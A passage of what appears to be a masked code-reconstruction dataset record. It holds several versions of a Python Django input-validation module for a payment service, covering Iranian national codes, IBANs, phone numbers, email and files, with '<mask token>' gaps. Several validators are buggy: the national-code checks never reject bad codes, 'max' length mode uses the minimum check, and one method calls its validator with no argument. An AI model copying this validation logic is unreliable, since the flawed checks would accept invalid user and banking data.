length, mode='equal', data='unAssigned'):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n self.addValidation({'field': field, 'value': data, 'length': length\n }, validatorFunction)\n return self\n\n def checkInputData(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_inputValidator)\n return self\n <mask token>\n\n def checkIsIbanTransferable(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IbanTransferable)\n return self\n <mask token>\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.objectValidator.getErrors()[key]\n self.statusCode = (self.objectValidator.statusCode if self.\n objectValidator.statusCode != 200 else self.statusCode)\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n if 'name' in errorKeys:\n messages.append('نام را وارد کنید')\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n if 'phone' in errorKeys:\n 
messages.append(\n 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append(\n 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'\n )\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n return messages\n",
"step-2": "<mask token>\n\n\nclass ObjectValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.statusCode = 200\n self.validationPipeline = []\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = ObjectValidator()\n return self\n <mask token>\n <mask token>\n <mask token>\n\n def addValidation(self, data, validatorFunction):\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_authenticationValidator(self, data):\n if not data['user'].is_authenticated:\n self.setError(data['field'], enum.Error.UNAUTHORIZED.value)\n <mask token>\n\n def _check_with_ObjectExistenceValidator(self, data):\n model = data['model']\n if not model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.\n GENERIC_OBJECT_NOT_FOUND.value)\n <mask token>\n\n def checkObjectExistence(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_ObjectExistenceValidator)\n return self\n\n def checkUserAuthentication(self, field, user):\n self.addValidation({'field': field, 'user': user}, self.\n _check_with_authenticationValidator)\n return self\n\n\nclass FieldValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], 
enum.Error.\n INVALID_FIELD_DATA.value)\n return self\n\n def addValidation(self, data, validatorFunction):\n if data['value'] == 'unAssigned' and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'\n ] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(\n nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n\n def _check_with_nationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = 
sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',\n 'درگاه پرداخت اینترنتی']:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.\n value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])\n if 'admin' in data['value'] or 'zibal' in data['value'\n ] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.\n PHONE_INCORRECT_TEMPLATE.value)\n\n def _check_with_mobileValidator(self, data):\n mobileNumber = data['value']\n if mobileNumber is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match('(^09[0-9]{9}$)', mobileNumber)\n if match_object is None or mobileNumber is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_emailValidator(self, data):\n email = data['value']\n if email is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(\n '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)', email)\n if 
match_object is None or email is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_noneValidator(self, data):\n if data['value'] is None or data['value'] == '':\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_fileValidator(self, data):\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n\n def _check_with_IBANValidator(self, data):\n iban = data['value']\n if len(iban) != 26 or not iban.startswith('IR'):\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n return\n code = iban[4:] + iban[:4]\n code = code.replace('I', '18').replace('R', '27')\n if int(code) % 97 != 1:\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID\n =data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.\n IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def 
_check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value\n )\n\n def _check_with_username(self, data):\n username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def checkType(self, field, type, value='unAssigned'):\n self.addValidation({'field': field, 'type': type, 'value': value},\n self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features='unAssigned'):\n self.addValidation({'field': field, 'value': features}, self.\n _check_with_featuresValidator)\n return self\n\n def checkUserName(self, field, username='unAssigned'):\n self.addValidation({'field': field, 
'value': username}, self.\n _check_with_userNameValidator)\n return self\n\n def checkPhone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkMobile(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_mobileValidator)\n return self\n\n def checkEmail(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options':\n options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {'userId': userId, 'subId': subId}\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length, mode='equal', data='unAssigned'):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n self.addValidation({'field': field, 'value': data, 'length': length\n }, validatorFunction)\n return self\n\n def checkInputData(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_inputValidator)\n return self\n\n def checkTelephone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n 
_check_with_phoneNumberValidator)\n return self\n\n def checkIsIbanTransferable(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IbanTransferable)\n return self\n\n def checkUsername(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_username())\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.objectValidator.getErrors()[key]\n self.statusCode = (self.objectValidator.statusCode if self.\n objectValidator.statusCode != 200 else self.statusCode)\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n if 'name' in errorKeys:\n messages.append('نام را وارد کنید')\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n if 'phone' in errorKeys:\n messages.append(\n 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append(\n 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'\n )\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n return messages\n",
"step-3": "<mask token>\n\n\nclass ObjectValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.statusCode = 200\n self.validationPipeline = []\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = ObjectValidator()\n return self\n <mask token>\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n\n def addValidation(self, data, validatorFunction):\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_authenticationValidator(self, data):\n if not data['user'].is_authenticated:\n self.setError(data['field'], enum.Error.UNAUTHORIZED.value)\n\n def _check_with_nonDuplicateObjectValidator(self, data):\n model = data['model']\n if model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)\n\n def _check_with_ObjectExistenceValidator(self, data):\n model = data['model']\n if not model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.\n GENERIC_OBJECT_NOT_FOUND.value)\n\n def checkNonDuplicateObject(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_nonDuplicateObjectValidator)\n return self\n\n def checkObjectExistence(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_ObjectExistenceValidator)\n return self\n\n def checkUserAuthentication(self, field, user):\n self.addValidation({'field': field, 'user': user}, self.\n _check_with_authenticationValidator)\n return self\n\n\nclass FieldValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode 
= 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n return self\n\n def addValidation(self, data, validatorFunction):\n if data['value'] == 'unAssigned' and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'\n ] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(\n nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n\n def _check_with_nationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], 
enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',\n 'درگاه پرداخت اینترنتی']:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.\n value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])\n if 'admin' in data['value'] or 'zibal' in data['value'\n ] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.\n PHONE_INCORRECT_TEMPLATE.value)\n\n def _check_with_mobileValidator(self, 
data):\n mobileNumber = data['value']\n if mobileNumber is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match('(^09[0-9]{9}$)', mobileNumber)\n if match_object is None or mobileNumber is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_emailValidator(self, data):\n email = data['value']\n if email is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(\n '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)', email)\n if match_object is None or email is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_noneValidator(self, data):\n if data['value'] is None or data['value'] == '':\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_fileValidator(self, data):\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n\n def _check_with_IBANValidator(self, data):\n iban = data['value']\n if len(iban) != 26 or not iban.startswith('IR'):\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n return\n code = iban[4:] + iban[:4]\n code = code.replace('I', '18').replace('R', '27')\n if int(code) % 97 != 1:\n self.setError(data['field'], enum.Error.IBAN_ERROR.value)\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID\n =data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.\n 
IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value\n )\n\n def _check_with_username(self, data):\n username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def checkType(self, field, type, value='unAssigned'):\n self.addValidation({'field': field, 'type': type, 'value': value},\n self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer1NationalCodeValidator)\n return self\n\n def 
checkOfficer2NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features='unAssigned'):\n self.addValidation({'field': field, 'value': features}, self.\n _check_with_featuresValidator)\n return self\n\n def checkUserName(self, field, username='unAssigned'):\n self.addValidation({'field': field, 'value': username}, self.\n _check_with_userNameValidator)\n return self\n\n def checkPhone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkMobile(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_mobileValidator)\n return self\n\n def checkEmail(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options':\n options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {'userId': userId, 'subId': subId}\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length, mode='equal', data='unAssigned'):\n if mode == 'equal':\n 
validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n self.addValidation({'field': field, 'value': data, 'length': length\n }, validatorFunction)\n return self\n\n def checkInputData(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_inputValidator)\n return self\n\n def checkTelephone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_phoneNumberValidator)\n return self\n\n def checkIsIbanTransferable(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IbanTransferable)\n return self\n\n def checkUsername(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_username())\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.objectValidator.getErrors()[key]\n self.statusCode = (self.objectValidator.statusCode if self.\n objectValidator.statusCode != 200 else self.statusCode)\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n if 'name' in errorKeys:\n messages.append('نام را وارد کنید')\n if 'username' in errorKeys:\n 
messages.append('نام کاربری را وارد کنید')\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n if 'phone' in errorKeys:\n messages.append(\n 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append(\n 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'\n )\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n return messages\n",
"step-4": "<mask token>\n\n\nclass ObjectValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.statusCode = 200\n self.validationPipeline = []\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = ObjectValidator()\n return self\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n\n def addValidation(self, data, validatorFunction):\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_authenticationValidator(self, data):\n if not data['user'].is_authenticated:\n self.setError(data['field'], enum.Error.UNAUTHORIZED.value)\n\n def _check_with_nonDuplicateObjectValidator(self, data):\n model = data['model']\n if model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)\n\n def _check_with_ObjectExistenceValidator(self, data):\n model = data['model']\n if not model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.\n GENERIC_OBJECT_NOT_FOUND.value)\n\n def checkNonDuplicateObject(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_nonDuplicateObjectValidator)\n return self\n\n def checkObjectExistence(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_ObjectExistenceValidator)\n return self\n\n def checkUserAuthentication(self, field, user):\n 
